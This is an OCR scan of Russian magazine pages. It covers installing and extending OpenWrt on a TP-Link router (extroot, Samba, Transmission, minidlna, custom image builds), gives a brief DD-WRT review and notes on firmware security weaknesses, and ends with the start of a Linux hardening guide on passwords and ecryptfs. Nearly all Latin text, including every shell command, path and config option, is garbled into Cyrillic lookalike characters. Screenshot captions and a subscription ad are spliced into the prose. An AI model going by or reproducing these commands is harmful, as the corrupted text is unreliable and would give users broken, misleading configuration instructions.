
орепигЕ# /ефс/1п1{.а/пефмогКкК гезфаг* 


орепигЕ# 


1177094300 - МОоЛИа Еиеох - +х 


Фойл Правка Вид Журнал Закладки Инструменты Справка | 
® ВС < х[{} ь х х | пмоказоо х [5 
< [3 19216801 -е 


трюк 


ОНСР |= 
$8 52" 03 
МАТ 


Роиигаг С) 


№750 У/гою$$ Оца! Вапд СюаьИ Коег 


№0341 Чо. Т.О 4 205 


Риптимаге Орогаде Нер 
То ырогабе Те Козлегь Мтимам, ЮЗоя 


Зесигву 


Рагесиа! Сопего 


Ассовв Сочиго 
Ачхатсе9 Кое 
В апефми ИР С бейте 
ФР $ МАС Вии 
Оупатк ОМЗ 


7-у6 Бирфоет 


Туле ЗеЙино» 


Борки 


‚ Рьстогу ОеТао И» 


Фаскыр & Мевиле 


- Мсьски 


ПрошивкаТР-ЫМК 
ТЕ-\М/ОВ4300 из «родно- 
го» Нгитмгаге 


У\УАВММС 


Будь внимателен! 
Неправильная про- 
шивка роутера может 
превратить его в бес- 
полезный кусок железа 
и пластмассы. 


Нагфиаге Метьюг: 


[пъотив/гогтуголлег/орегиии-аг71хх-депегк-иие [ Обзор. | 
3.13.33 Вова 130817 1.48230 

ироко} 
984360 у! 60000008 2. Ргшег ое зейес! Фе реп пате мпете 


1. Оожтуоб в том гесепЕ Яго 


3. 
ирогаииу Ги Бег бпиме<. 


Ре орфгаде Ме пил! ассога аи Ге сигтеги 
Рагаиимие усгиюи 


Моде: Те Миттуивге чегыоп пи согтезропа 
№ Ре гагамаее. ТПе ирогабе ргосева аев 
а № тотель ап Фе Воддег геев 
эилоуазсаПу мимеа Фе ирогаде в сотруеыь 
& 5 миром! Ю Веер роз! аррёе4 дигиу 
Ре спбге ргосеоз. (098 06 рочег Фито пе 


ИС (УпНеа Сопйдиганоп теГасе) представляет собой по- 
пытку сделать унифицированные файлы (и средства) конфи- 
гурации. Все настройки УС хранятся в каталоге /ефс/сопйв. 
Для тех служб, которые используют свои файлы конфигурации, 
скрипты Ореп\М/ при запуске генерируют их на основе шаблона 
и файла ЦС! — так, например, сделано с Затва. Да, возможно, 
это уменьшает гибкость, зато в большинстве случаев упроща- 
ется конфигурирование тех или иных параметров, путем ли ре- 
дактирования файлов конфигурации (с использованием \1) или 
же используя утилиту ис. 

Вернемся к командной строке. Что делают первые три 
команды, в общем-то, ясно: первая устанавливает протокол 
(возможно выбрать статический ПР, РРР РРРоЕ, 12ТР и еще 
несколько менее используемых вариантов), вторая устанав- 
ливает флаг Оогоааса${ в пакете айср, третья устанавливает 
МАС-адрес для интерфейса. Четвертая команда устанавливает 
поле Спейр в пакете айср (орйоп 61) равным МАС-адресу. По- 
следние две команды используются для сохранения изменений 
и перезапуска сети. 

После этого (и после обязательной проверки работоспособ- 
ности) я бы посоветовал поставить веб-интерфейс, так как ба- 
зовые настройки с ним реально проще рулить. Для Ореп\М А та- 
ковых существует как минимум две. Поставим ШиС| — де-факто 
стандартный веб-интерфейс: 


орепмг{# орк ираате 
орепигЕ# орк 1п${а11 1ис1 


- а ое Фея | Терминал - гопу®гот-дез Кор: = = щх’ 
Фойл Правна Вид Журнал Закладки Миструменты Справа — 
Орелиит - Очи + ЦКТ 82| | Файл Правка Вид Терминал Переход Справка 
$2 | 3 ман « @ [Е янды а @ Е = 
; сопя #1оба1 ацтозмар 
орефот Ргот_Р5таь 1 
орт1оп апоп_эмар 0 


Ореп\м 

ТРИМК ТМ ОВ 3600/14 300/4310 

Оренмим мекиюе АбромитееЕ 12.09 / 1 0.11.1 Комов (0.11.1) 
338 

$56 № 27 13:58206 2013 

2т 5Эт 37% 

0.17, О, о 


113080 68 / 126674 6 (99795) 
$3520 кб / 126676 %6 (75% | 
15606 кб / 126676 иб 12%] 


$824 кб / 126676 6 (1%) 


Туре: хр 
Абфеени: 1902 98247 
‚ №Мые 2552552550 
^ 
бабетеу: 192 16821 
5202 в 1: 4821 


Веб-интерфейс Ореп\М{ 


сопЕТр топе 
орттоп 
орЕ1оп 
орЕ1оп 
орттоп 
орЕ1оп 
орЕлоп 


соп1я эмар 
орЕ1оп 
орЕ1оп 


сопРар моипЕ 
орЕтоп 
орттоп 
орЕтоп 
орелоп 
орЕтоп 


и Рыситыа 
/Дем/да1 


тагрете 
Демтсе 
Е5туре — ехЕ4 
орЕтоп$ гм, упс 
епаб1ед 0 
епа61е9_Т5ск 0 


Чемлсе /Чем/ Ча? 
епаь1е9 0 


Тагрее /омегТау 
Фем1се /деу/$9а1 
Езтуре ехтЗ 
орЕ1оп$ ги, зупс 
епаБ1е9 11 


Т герсисоп 1 /Ттаь [Мо91Р1е9] 26/26 100% ы 


Редактирование файла /етс/сопЯд/51а6 для включения ех{гоо1 


122 Отхога 
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орепиг{# /ефс/1п1е.А/ийЕЕра епаб1е орЕ1оп Е5фуре ехЕЗз 

орепиг{# /ефс/1п1е.А/иИЕЕра зфагЕ орЕ1оп орЕ1оп$ гм, упс 
ор{1оп епаб1еа 1 

И ставим пароль гос\. ор{1оп епаб1еа_Фзск 9 


орепмг{# раз$ма После этого перезагрузись. 


МТУ Если тебе необходимо вернуть все обратно, ты находишь 
Замечу, что после установки пароля ты уже не сможешь ис- в ранее записанном выводе команды тоий оригинальное 
пользовать Тепе, только ЭЗН. Теперь зайди в веб-интерфейс Всевозможная докумен- устройство с оверлеем, монтируешь его и ставишь в файле 
и настрой необходимые тебе параметры. тация по Ореп\: ефс/сопй=/+5фаб6 на смонтированном старом оверлее орйоп 
В общем-то, на этом настройку роутера можно и закончить. мик. орепми(.огд/ епаЫесч в 0. 
Однако я не нахожу особого смысла перешивать роутер, если дос/$таг{ 


ты не будешь использовать дополнительные возможности про- 
ШИВКИ. Поэтому идем дальше... 


СОЗДАНИЕ ЕХТВООТ 

Ежгоот необходим для того, чтобы у роутера было больше сво- 
бодного места, — разумеется, за счет подключения внешнего 
накопителя, такого как флешка. Существует два типа создания 
ех{гоо{ — перемещая на накопитель только оверлей и переме- 
щая корень целиком. Сказать по правде, во втором варианте 
смысла мало — оверлей в роутере в любом случае использу- 
ется, поэтому будем разбирать первый метод. Но иу него есть 
две версии. Поскольку я рассматриваю наиболее свежую ста- 
бильную версию Ореп\\ Ч, то и способ тоже будет соответство- 
вать. На более старых ревизиях он, однако, может не работать. 
Ставим пакеты: 


орепмг{# орк ираа*е 
орепигЕ# орКв 1п$фа11 Б1оск-тоипе Ктоа-и$Б-$5фогазе += 
Ктоа-$с$51-вепег1с Ктод-+5-ех{4 е2+5ргов$ 


Запиши текущий вывод команды тоип{ — он тебе еще приго- 
дится в дальнейшем. 

После этого подготовь и подмонтируй флешку (ее ты мо- 
жешь отформатировать в ех{3 как на настольном Шпих, так 
ивсамом Ореп\ М“) и клонируй на нее текущий оверлей: 


орепиг*{# ткКа1г /тпе/Яа$П_о\уег1Тау 


орепиг{# тоипЕ /аеу/54а1 /тпе/ЯазИ_омег1ау 


орепигЕ# фаг -С /омег1ау -суф - . | Фаг -С + 
/типф/ЯазИ_омег]ау -х+ - 


Только после этого ты можешь редактировать файл /ефс/ 
сопй5/+5фаБ, записывая в него параметры для использования 
ех{гоот: 


ИР. 
сопйа тмоипе 
ор{1оп фагреф /омег]ау 


ор{1оп 4е\у1се /4еу/$9а1 


КАЧАЕМ ТОРРЕНТЫ И НАСТРАИВАЕМ ЗАМВА 

Раз уж роутер практически не выключается и места для уста- 
новки стороннего ПО в нем теперь достаточно, грех не исполь- 
зовать его в качестве загрузчика торрентов. Но сперва нужно 
настроить файлообмен. Поскольку сеть у меня гетерогенная, 
выбор пал на Затва. 


орепмг{# орк ираате 

орепигЕ# орк 1п$$а11 затба36-с11еп ++ 
сатба36-зегуег 1ис1-арр-затБа 

орепигЕ# гт /&тр/1ис1-1паехсасйе 


В задачи статьи не входит детальное описание настройки 
Затва, а с веб-интерфейсом ты способен разобраться и сам. 
Несколько замечаний, однако, стоит сделать. Во-первых, 
на вкладке Ед 1етр!ае вместо «зеситу = изег» стоит написать 
(хотя бы для начала) «зесищу = зПаге», во-вторых — дай госте- 
вой доступ к расшаренным папкам, в-третьих — смени вла- 
дельца расшариваемого каталога на породу и, наконец, не за- 
будь запустить саму службу: 


орепигЕ# /ефс/1п1е.а/затба епаб1е 
орепигЕ# /ефс/1п1е.а/затба $Жаг® 


Теперь перейдем к настройке торрент-клиента. Мы выбрали 
{гапзпп!5$юп — не в последнюю очередь из-за того, что он под- 
держивает веб-интерфейс. Установка стандартна: 


орепмг{# орк= ираате 
орепигЕ# оркКё 1п5$$а11 {гап$т1$$1оп-Чаетопй «= 
{гап$11$$5$1оп-меБ 


Рассмотрим наиболее важные опции файла конфигурации 
/ефс/сопй&/{гап$т1$$1оп: 


сопйа {гап$т1$$10п 
АВА 
# Включает демон 


орЕ1оп епаб1еа '1' 


ы Терминал - гоу гот-дезКтор: -ЛореглигЬегипК 
| Файл Правка Вид Терминал Переход Справка 


паке[3] -С +0015/ацеотаке сотрЕ1е 
паке[3] -С т0015$/ацтотаке 1п5та11 
маке[3] -С +0015/ятр сотр11е 
паКе[3] -С +0015/атр 1151211 
паке[3] -С 10015/трЁг сотр 1е 
паке[3] -С 10015/юрЁг 1п5та11 
паКе[3] -С 10015/трс сотр 1е 
паке[3] -С 10015/трс 1п5{а11 
макКе[3] -С 10015/11Бе]Р сотрЕТе 
паке[3] -С 10015/116е1{ 1п51а11 
маке[3] -С 10015/Еех сотр е 
маке[3] -С 0015/11 ех 1п51а11 
маке[3] -С 10015/6150п сопр1е 
паке[3] -С #001$/61501п 1п5%а11 
паке[3] -С 10015/тк116$ сотр ]е 
паке[3] -С 10015/тк1165 1151211 
маКе[3] -С 10015/551г1р сотр е 
паке[3] -С 0015/55 гар 1п51а11 
маке[3] -С 60015/1рКя-иЕ115 сотр11е 
паКе[3] -С 10015/1ркКя-4111$ 1056а1 
макКе[3] -С 10015/репехе2Р5 сотр! 1е 
паКе[3] -С 10015/репехЕ2Т$ 1п56а11 


паке[3] -С 109015/е2Р5ргоя$ сотр 1е 
|| - 


Сборканеобходимых инструментов 


= _Файл Правка Вид Терминал Переход Справка 


| < 


Терминал - гот @гот-дезКеор: -ЛорегиигегулК -+х` 


Выбор опций при сборке кастомной прошивки 
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# Каталог генерируемого конфига 
ор1оп сопй5_а1г '/ефс/гап$т1$$1о0п' 
# Пользователь, от которого запускается демон. 
# Поскольку гостевой пользователь $атба — 
# пободу, то ставим его и здесь 
ор{1оп изег 'поБоду" 
# Каталог хранения загруженных файлов 
ор{1оп аомп1оа9_а1г '/Поте/ $Фогаве/Фоггеп*$ /<= 
допе' 
# Каталог недокачанных файлов 
орЕ1оп 1псотр1ефе_41г '/Поте/ $Фогазе/Фоггеп®$ /*= 
1исотр]1 " 
бай 


После этого ставим его в автозапуск и стартуем. 


орепмг{# /ефс/1п1*.а/Егап$т1$$1оп епаб]1е 
орепмг{# /ефс/1п1*.а/гап$т1$$1о0п зфагЕ 


Заходим в веб-интерфейс, по умолчанию находящийся 
на порту 9091, грузим торрент-файл и наслаждаемся. 


НАСТРОЙКА ОЕМА-СЕРВЕРА 

Да, твой роутер может выступать и в этом качестве. Если корот- 
ко, ОЫМА-сервер раздает различный медиаконтент в сети. Мно- 
гие современные мультимедиаустройства, такие как телевизо- 
ры, игровые приставки, музыкальные центры и Ву-гау-плееры, 
поддерживают этот стандарт. В Ореп\\ Е есть ттата — легко- 
весный и несложный в настройке ОЦМА-сервер, который мы 
сейчас и установим: 


орепиг# орк& ираа*е 
орепмг{# орК= 1п5{а11 т1п1А1па 


Файл конфигурации находится в стандартном для ЧС! 
конфигов месте — /ефс/сопЯз/т1п1А1па. Разберем его основ- 
ные параметры: 


# Не опечатка — действительно зачем-то повторяется 
сопйа т1п14]па сопйв 
а 
орЕ1оп епаб1ед '1' 
# Какой интерфейс слушаем 
орЕ1оп 1пфегфасе "'Бг-Тап"' 
# Каталог БД м1п1А1па и логи 
ор1оп аБ_а1г '/Поте/ огаве/т1п1а1па/аЬ" 
орЕ1оп 105_41г '/Поте/ фогаёе/т1п191па/1о8' 
# Каталоги с медиафайлами 
115 мед1а_41г ‘А, /Поме/ огаёе/аца1о' 
115 тед1а_а1г '\, /Поте/ Фогаде/у14ео' 
115 теЧ1а_а1г 'Р,/Поте/ Фогаве/рпо*о' 
а 


В принципе, после этого тшю@па можно уже запускать, 
предварительно скопировав медиафайлы в нужные папки. 


орепмг{# /ефс/1п1*.а/т1п14]па епаб1е 
орепмг{# /ефс/1п1*.а/т1п1Ч]па $ФагЕ 


Однако есть небольшой нюанс. Захотел ты добавить музыку 
или видео, скопировал — а на плеере она не появилась. Дело 
здесь в том, что по умолчанию тта использует тойТу, кото- 
рый по загадочным причинам в нем не работает. Чтобы обно- 
вить список, необходимо остановить запущенный демон и про- 
извести ручное сканирование, набрав следующую команду: 


орепмг{# т1п191па -К -Е /&тр/т1п1а1па. сой+ 


СБОРКА СВОЕГО СОБСТВЕННОГО ОБРАЗА ОРЕМ\/ВАТ 
Если тебя по какой-то причине не устраивает стандартный об- 
раз Ореп\\\, то можно собрать свой, для чего необходимо по- 
лучить тулчейн и Ореп\М/ Вийагоот. Прежде всего установим 
соответствующие пакеты: 


$ зи4о ар{-веф 1п${а11 зибуег$1оп 6и11а-еззеп1а1 «= 
51&-соге 11Бпсиг$е$5-4еу 7211615-4еу вамК 


72.3 


ФС, ИСПОЛЬЗУЕМЫЕ В РОУТЕРАХ 


Из-за особенностей (и, как правило, малого объема) флеш-памяти, в ос- 

новном и применяемой в роутерах, для них не подходят ФС для настольных 

компьютеров. Поэтому кратко опишу различия двух основных файловых си- 

стем, в них используемых. 

. озачазпЕ$ — только для чтения. Поддерживает сжатие, что немаловажно 
для систем с ограниченным объемом флеш-памяти. 

. УЕРФ2, в отличие от Зача$ НЕ$, рассчитана на чтение/запись. Также под- 
держивает сжатие, но в меньшей степени. Журналируемая. 


В случае Ореп\\1 эти две ФС разнесены по разным п{а-разделам и мон- 
тируются хитрым образом. Сперва Заца$ПЕ$ монтируется в /гот, а УЕЕ$2 
в /оуейау. Затем с помощью оуейау эти две ФС объединяются в одну 
и при попытке изменения файла в ЗачазВЕ$ изменяет его в УЕЕ$3З, обе- 
спечивая таким образом поддержку не только чтения/записи, но и возмож- 
ность загрузки в безопасном режиме для восстановительных работ. 


КРАТКИЙ ОБЗОР 00-М/ВТ 


ОО-М/АТ необходимо шить с оригинальной заводской прошивки — воз- 
можность прошить из-под Ореп\ не предусмотрена. После прошивки 
и перезагрузки мы обнаруживаем в браузере требование сменить пароль. 
Оно, конечно, правильно, но непонятно — зачем скрывать под звездочками 
еще и имя пользователя. Установили его и сразу автоматически переходим 
на вкладку Зтати$ -> Зуз-шпто, где видим, что все отключено. Как только мы 
пытаемся перейти на другую вкладку, у нас спрашивают пароль. 
Беглый обзор вкладок дал следующую информацию о доступном ПО: 

. оатра и РгоЕТРО; 

. ОрепУ\УРМ и РРТР; 

. Пэфх — позволяет создавать туннель |Р оуег ОМ$, что позволяет в неко- 
торых случаях использовать роутер как «окно» в интернет, если ты под- 
ключаешься через какую-нибудь платную точку доступа, а денежки тебе 
жаль; 

. несколько вариантов Н{Зро{-серверов — для того случая, если ты жела- 
ешь организовать свой хотспот; 

. УР-прокси. 


Чтобы включить доступ к орм/аге (дополнительному ПО), придется по- 
возиться. Замечу, что в некоторых версиях прошивки есть раздел УЕЕЗ2, 
а в некоторых нет, так что лучше для этой цели использовать флешку. 

ОБ-М/АТ подходит тому, кто хочет быстро получить доступ к отдельным 
функциям, которые в большинстве роутеров отсутствуют, но не желает замо- 
рачиваться с установкой дополнительного ПО. В общем-то, его возможности 
покрывают процентов 90 пользователей альтернативных прошивок. Те же, 
у кого потребности слишком специфичны или кто желает получить больший 
контроль над роутером, вполне могут разобраться и с другими прошивками. 


.- СОТ (Бо 216761: 10; Мен Нине „ Ф.Я 
Фойл Правяа Вид Журная Закладки Инструменты Справка 
4 омашн.. | боя. х | В)пяжамит,. | Опутилиь. [50 ОО4МАТ Е. | | Мяжчтые-- | — МУТЛР = | Е зралиик №. | ` Прошиив.. | © Нор › <? > 


Г м хе Бои 8 © 


ОО-мТ 


ТРИМХ 1.084500 +1 


123$ 011200 


104 30112 


+9368 


9348 


9346 


93% 


Веб-интерфейс ОО-М/АТ 


724 Отшхога 
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Собирать мы будем текущую нестабильную версию Ореп\М [7 Терминал - гот@гот-дезКтор; -/орепми А гипК -+х 
и материалы (теедз). Скачаем их. Файл Правка Вид Терминал Переход Справка - 
готегот-ЧезКеор: -/орепигЕ/+гипк$ 5ср Б1п/аг71хх/орепиг{-аг71хх-репег1с-11-\4г430_^ 


тка1г орепмгЕ && са $_ 

мп со $\п: //5\п .орепмг* .ог8/орепиг{ /гипк/ 
с гипк 

./5сг1ре$/Реех ирда*е -а && «< 
./5сг1ре$/Рее$ 1п${фа11 -а 


ЮЗ 54 69 64 


После этого проверим зависимости — мало ли, вдруг какой- 
нибудь необходимый для сборки пакет не установлен. 


$ таке ргегеа 


Если все нормально, можем конфигурировать образ. 
Для чего вводим 


Копирование про- 
шивки в роутер 


$ таке меписопйя 


ивыбираем, точно так же, как и при конфигурации ядра, нужные 

тебе вещи. Единственное отличие от «ядерного» теписопйа — 

звездочка означает, что объект будет встроен в образ, а М — 
что будет доступен в виде пакета фк, который позже можно 
будет установить отдельно. Сильно увлекаться, однако, не со- 
ветую — помни о том, что места на внутренней флеш-памяти 
не просто мало, а очень мало. 

В основном процесс конфигурирования включает в себя 
следующие шаги: 

. Выбор конкретной целевой системы и профиля. Их необхо- 
димо указывать как можно точнее — если укажешь непра- 
вильно, ты рискуешь превратить роутер в кирпич. 

. Выбор пакетов. Здесь действует правило — чем меньше 
ты встроишь их в образ, тем лучше. Поэтому выбирай только 
самые необходимые. Я бы посоветовал включить ШиС1. 

. Настройки сборки. Тут ты можешь разве что в разделе 
Сора! Бийа зейтод$ включить/выключить |Р\уб. В Адуапсеа 
сопйдигаНоп ор#юоп$ стоит лезть, только когда ты четко зна- 
ешь, для чего, к примеру, служит та или иная опция @СС, 
достаточна ли мощность процессора для включения защиты 
стека и так далее. 

. Выбор модулей ядра. Тут те же самые рекомендации, 
что и при выборе пакетов. Загляни в секцию УЗВ Зиррой 
и включи опцию Ктод-и$б-Зогаде. Остальные включай 
по желанию. 


Если же тебе зачем-то понадобится подправить ядерный 
конфиг, используй 


$ таке Кегпе1_теписопй? 


Учти, что если ты потом сделаешь очистку, то конфиг ядра 
не очистится. Для его очистки набери 


$ уп гемегЕ -К Жаггее/11пих/ 


После всего этого можешь смело набирать команду 


$ таке 


для сборки образа. Это займет длительное время, по истечении 
которого в каталоге 61п/ появятся файлы образа. 

Существует несколько путей для того, чтобы залить прошив- 
ку. Самый легкий из них — через веб-интерфейс, и описывать 
его я смысла не вижу. Второй способ — использовать утилиту 
ср нахостовом компьютере вкупе с п на роутере для залития 
образа и его прошивки. Поскольку сейчас стоит уже Ореп\/Ч, 


Первый способ залить прошивку — веб- 
интерфейс. Второй — использовать ути- 
литу $ср на хостовом компьютере и п" 
на роутере для залития и прошивки образа 


0-У1-59ца$В#$-Расфогу.Б1п гоот@192.168.1.1:/4тр 

го0+@192.168.1.1'$ раз$мога: 

орепмг{-аг71хх-репег1с-{1-м49г4300-у1-$диа$Н#5 100% 7936КВ 2.6МВ/5 00:03 
гот@гот-дезКфор:-/орепмг{/гипк$ 1 


то можно прошивать как Тастюгу-, так и зузироагаае-образ. 
В моем случае команды были такими: 


$ ср 61п/аг71хх/орепмг%-аг71хх-вепег1с-{1-маг4300.-= 
-\1-заца$И+$ -Расфогу.61п гоо*@192.168.1.1:/тр 


орепиг{# ше -г мг1фе /&тр/орепиг*-аг71хх-вепег1с-+‹= 
{1-м9г4300-\1-здиа$Н+$-Фасфогу.61п Ягтмаге 


Вторая команда шьет (ммйе) свежескачанную прошивку 
в раздел, именуемый Нитмаге, и вслед за этим роутер пере- 
загружается (-г). В случае обновления Ореп\/ со стабильной 
версии до текущей я бы советовал не восстанавливать со- 
храненную конфигурацию, а настроить все заново — у меня 
по каким-то причинам старые конфиги не подошли к свеже- 
скомпилированной версии. 


БЕЗОПАСНОСТЬ АЛЬТЕРНАТИВНЫХ ПРОШИВОК 

В плане безопасности со стороны всяческих атак на сервисы 

из интернета роутеры нынче защищены по умолчанию. Тем 

не менее расслабляться не следует. 
Опишем несколько возможных векторов атак на роутеры 

с альтернативной прошивкой. 

. Отсутствие пароля в Ореп\!. И если в веб-интерфейсе 
(который обычно еще нужно устанавливать) хоть как-то 
предупреждают об этом, то при заходе по Тете молчат. 
Хотя можно было бы написать скрипт, который требовал бы 
установки пароля, а после его установки отключал Тепщ 
как таковой. 

. Отсутствие тайм-аута при неправильных попытках ввода 
пароля. В домашней сети это вроде и ни кчему... но можно 
подцепить малварь, которая атакует роутер и перешивает 
его. Пользователь может долгое время не подозревать, 
что он в ботнете, — и даже переустановка ОС, понятно, ни- 
чего не даст. 

. Отсутствие проверки подлинности пакетов в Ореп\\/ч. Па- 
кеты 1рк не имеют цифровой подписи. В том случае, если 
репозиторий будет скомпрометирован (или хотя бы про- 
изойдет подмена ОМ$-адреса), это будет чревато зараже- 
нием роутеров малварью. 

. В ОО-МАТ \М-Е! по умолчанию включен и никак не шиф- 
руется, что само по себе рискованно, а при выключенном 
5$5Н рискованно вдвойне. 


В общем-то, некоторыми из этих потенциальных уязвимо- 
стей страдают и стоковые прошивки роутеров. Тем не менее 
разработчикам альтернативных прошивок стоит озаботиться 
данным вопросом — думается, что подобные цели могут стать 
наиболее вкусными для разработчиков малвари из-за их сла- 
бой защищенности. 


ЗАКЛЮЧЕНИЕ 
Альтернативные прошивки дают большую свободу для поль- 
зователей. Некоторые из них, такие как ОО-\М/РВТ, Тотат, про- 
шивка от Олега, заточены под нужды большинства — в них 
есть поддержка МА$, УРМ, есть принт-серверы... Другие же 
(Ореп\//ИЧге\МАТ) содержат минимально необходимые воз- 
можности, но при этом позволяют их расширять и затачивать 
под свои нужды. 

Возможно, прочитав эту статью, ты захочешь стать одним 
из разработчиков прошивок, благо область довольно новая 
и толком до конца не освоенная. Дерзай. = 


166 рублей заномер! 


Нас часто спрашивают: «В чем преимущество подписки?» ПОДП ИСКА 
Во-первых, это выгодно. Потерявшие совесть распространи- 

тели не стесняются продавать журнал за300 рублей ивыше. 6 месяцев 1110 р. 
Во-вторых, этоудобно. Не надо искать журнал в продаже 12 месяцев 1999 р. 


и бояться проморгать момент, когда весьтиражуже раз- 
берут. В-третьих, это быстро (правда, это правило действует 


недля всех]: подписчикам свежий выпуск отправляется рань- 
ше, чем он появляется на прилавках магазинов. 
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Гайд по обеспечению безопасности пих-системы 


Никто из нас не хочет, чтобы личная информация попала 

в чужие руки. Но как защитить систему от атак и хищений 
данных? Неужели придется читать километровые мануалы 
по настройке и алгоритмам шифрования? Совсем не 
обязательно. В этой статье я расскажу, как сделать Ипих- 
систему безопасной буквально за 30 минут. 


ВВЕДЕНИЕ 

Мы живем в век мобильных устройств и посто- 
янного онлайна. Мы ходим в кафе с ноутбуком 
и запускаем на домашних машинах веб-серверы, 
выставленные в интернет. Мы регистрируем- 
ся на сотнях сайтов и используем одинаковые 
пароли для веб-сервисов. В наших карманах 
всегда лежит смартфон, в который забиты де- 
сятки паролей, и хранятся ключи от нескольких 
55Н-серверов. Мы настолько привыкли к тому, 
что сторонние сервисы заботятся о нашей кон- 
фиденциальности, что уже перестали уделять ей 
внимание. 

Когда я потерял смартфон, мне сильно повез- 
ло, что установленный на него антивор оказался 
работоспособным и позволил удаленно стереть 
все данные из памяти девайса. Когда я по невни- 
мательности открыл Э$ЗН-порт на домашней ма- 
шине с юзером без пароля (!) во внешний мир (!!), 
мне сильно повезло, что на машину пробрались 
скрипт-кидди, которые, кроме смешной истории 
шелла, не оставили никаких серьезных следов 


своего пребывания в системе. Когда я случайно 
опубликовал в интернете листинг со своим паро- 
лем от Стай, мне сильно повезло, что нашелся 
добрый человек, который сообщил мне об этом. 

Может быть, я и раздолбай, но я твердо уве- 
рен, что подобные казусы случались со многими, 
кто читает эти строки. И хорошо, если эти люди, 
в отличие от меня, серьезно позаботились о защи- 
те своей машины. Ведь антивор мог бы и не сра- 
ботать, и вместо скрипт-кидди в машину могли 
пробраться серьезные люди, и потерять я мог 
не смартфон, а ноутбук, на котором кроме пароля 
пользователя не было никакой другой защиты. Нет, 
полагаться на одну двухфакторную аутентифика- 
цию Сооде и дурацкие пароли в наш век опреде- 
ленно не стоит, нужно что-то более серьезное. 

Эта статья — гайд параноидального юник- 
соида, посвященный тотальной защите Шпих- 
машины от всего и вся. Я не решусь сказать, 
что все описанное здесь обязательно к приме- 
нению. Совсем наоборот, это сборник рецептов, 
информацию из которого можно использовать 


для защиты себя и данных на тех рубежах, где это 
нужно именно в твоей конкретной ситуации. 


ПАРОЛЬ! 

Все начинается с паролей. Они везде: в окне ло- 
гина в Ипих-дистрибутиве, в формах регистра- 
ции на интернет-сайтах, на ЕТР- и 5ЗН-серверах 
и на экране блокировки смартфона. Стандарт 
для паролей сегодня — это 8-12 символов в раз- 
ном регистре с включением цифр. Генерировать 
такие пароли своим собственным умом довольно 
утомительно, но есть простой способ сделать это 
автоматически: 


$ ореп$$1 гапа -Базеб4 6 


Никаких внешних приложений, никаких рас- 
ширений для веб-браузеров, Ореп55Е есть 
на любой машине. Хотя, если кому-то будет удоб- 
ней, он может установить и использовать для этих 
целей рум/деп (поговаривают, пароль получится 
более стойким): 


$ ривеп -В$ 8 1 


Где хранить пароли? Сегодня у каждого юзера 
их так много, что хранить все в голове просто не- 
возможно. Довериться системе автосохранения 
браузера? Можно, но кто знает, как Соое или 
Мо7Ма будет к ним относиться. Сноуден расска- 
зывал, что не очень хорошо. Поэтому пароли надо 
хранить на самой машине в зашифрованном кон- 
тейнере. Отцы-основатели рекомендуют исполь- 
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®) и5е {Пе Го!омипд спагаЖеге: 
Х| Уррегцецег$ —] 5расе 
Х 1ю\ег 1 еКегз Му 
Хх Митьег$ Х| Чпаепте 
_| бреда! СпагаЖегз |_| Напег АМ$Т СпагаКег$ 


Узе оту {пе ГоЙомипд спагаЖеге: 


Х (зе '/деу/гапаот' (гесоттепа) 


| Сепегаее | 


Ме! Ра55мога: РМВПЬМОААаКТХУ _ | 
Оцайу: нию —) 112 Ви 


АссерЁЕ | Сапсе! | 


В КееРа$$Х есть свой генератор паролей 


зовать для этого КееРа$$Х. Штука графическая, 
что не сильно нравится самим отцам-основате- 
лям, но зато работает везде, включая известный 
гугль-зонд Апагоа (КееРа$$Огоа). Останется 
лишь перекинуть базу с паролями куда надо. 


ШИФРУЕМСЯ 

Шифрование — как много в этом слове... Сегод- 
ня шифрование везде и нигде одновременно. 
Нас заставляют пользоваться НТТР$-версиями 
сайтов, а нам все равно. Нам говорят: «Шифруй 
домашний каталог», а мы говорим: «Потом на- 
строю». Нам говорят: «Любимое занятие сотруд- 
ников Огорбох — это ржать над личными фотками 
юзеров», а мы: «Пусть ржут». Между тем шифро- 
вание — это единственное абсолютное средство 
защиты на сегодняшний день. А еще оно очень 
доступно и сглаживает морщины. 

В Ипих можно найти тонны средств шифро- 
вания всего и вся, от разделов на жестком диске 
до одиночных файлов. Три наиболее известных 
и проверенных временем инструмента — это ат- 
СГурУТОК$, есгурИ$ и епс{5. Первый шифрует це- 
лые диски и разделы, второй и третий — каталоги 
с важной информацией, каждый файл в отдель- 
ности, что очень удобно, если потребуется де- 
лать инкрементальные бэкапы или использовать 
в связке с Огоррох. Также есть несколько менее 
известных инструментов, включая ТгиеСгурт на- 
пример. 

Сразу оговорюсь, что шифровать весь диск 
целиком — задача сложная и, что самое важное, 
бесполезная. Ничего особо конфиденциаль- 
ного в корневом каталоге нет и быть не может, 
а вот домашний каталог и своп просто кладезь 
инфы. Причем второй даже больше, чем первый, 
так как туда могут попасть данные и пароли уже 
в расшифрованном виде (нормальные програм- 
меры запрещают системе скидывать такие дан- 
ные в своп, но таких меньшинство). Настроить 
шифрование и того и другого очень просто, до- 
статочно установить инструменты есгур{5: 


$ зи4ао ар*-веф 1п5%а11 есгурЕ$-и*11$ 


И собственно, включить шифрование: 


$ зиао есгурЕР$ -зефир-5мар 
$ есгурЕР5 -зежир-рг1уае 


Далее достаточно ввести свой пароль, ис- 
пользуемый для логина, и перезайти в систему. 


Параноид линуксоид 


127 


Оопе соп?т19уг1пд. 


боте тпрогфап{+ Мо{тез! 


ТО СОМРЕЕТЕ ТНЕ МТСРАТТОМ!!! 


Есгур $ предупреждаетнас 


Да, все действительно так просто. Первая коман- 
да зашифрует и перемонтирует своп, изменив 
нужные строки в /@с/А$аб. Вторая — создаст 
каталоги -/.Риужще и -/Риумже, в которых будут 
храниться зашифрованные и расшифрованные 
файлы соответственно. При входе в систему 
будет срабатывать РАМ-модуль рат_есгурИ$. 
$0, который смонтирует первый каталог на вто- 
рой с прозрачным шифрованием данных. По- 
сле размонтирования -/Риуе окажется пуст, 
а -/.Риуае будет содержать все файлы в зашиф- 
рованном виде. 

Не возбраняется шифровать и весь домашний 
каталог целиком. Производительность при этом 
упадет не сильно, зато под защитой окажутся во- 
обще все файлы, включая тот же сетевой каталог 
—/Огорбох. Делается это так: 


# есгурЕР$-т1га%фе-Потме -и уазуа 


Кстати, места на диске должно быть в 2,5 раза 
больше, чем данных у уазуа, так что рекомендую 
заранее почиститься. После завершения опера- 
ции следует сразу войти под юзером уазуа и про- 
верить работоспособность: 


$ тоипЕ | 2гер Рг1уафе 


/поте/уазуа/.Рг1\уафе оп /поте/уазуа «= 
фуре есгур $... 


Если все ОК, незашифрованную копию данных 
можно затереть: 


$ зидо гт -г /поте/уазуа.* 


ЗАМЕТАЕМ СЛЕДЫ 

ОК, пароли в надежном месте, личные файлы 
